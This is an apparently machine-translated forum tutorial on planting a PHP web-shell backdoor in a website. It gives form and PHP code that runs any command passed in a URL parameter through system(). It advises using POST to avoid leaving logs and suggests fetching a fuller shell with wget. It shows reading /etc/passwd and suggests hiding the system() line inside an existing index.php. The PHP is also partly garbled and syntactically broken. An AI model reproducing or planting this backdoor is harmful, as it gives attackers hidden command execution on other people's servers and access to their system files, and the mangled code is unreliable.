Hello friends, today I will explain how to backdorize a web. That is how to create a file that executes commands, either in linux or windows (depends on which server is).
This is safer since it only leaves 1 log and if you do it with POST method does not leave logs. The code would look like this:
Code: PHP
---------------------------------------------------------------------------------------------------------------------------------------------------
<form method = "GET" action = "lol.php">
<input type = "text" name = "command">
<input type = "submit" value = "execute">
<? php
if ( isset ( $ _GET 'command' ) ) ;
{
$ lol = @ system ( $ _GET 'command' ) ;
echo $ lol ;
}
?>
------------------------------------------------------------------------------------------------------------------------------------------------------------
In the form we that command to run, so we have control over the server and can run any command, if you please use wget (LINUX) and upload a shell and Borras, a clear example of how it works would be this:
I will explain a little the function for which our Mini Backdoor works:
System: It is a function that allows to execute commands inside a server.
In the photo what I did was to execute the command cat / etc / passwd and as you can see I executed it successfully.
Another thing we can do is put
Code: PHP
$ lol = @ system ( $ _GET 'command' ) ;
in some example index.php file and call the variable lol by url and execute the command an example would be server.com/index.php?comando=cat+%2Fetc%2Fpasswd
and would execute what is the command.
Acknowledgments: Oggy & HD_Breaker
Hope you liked it.
greetings
Be the First to Respond
Share Your Thoughts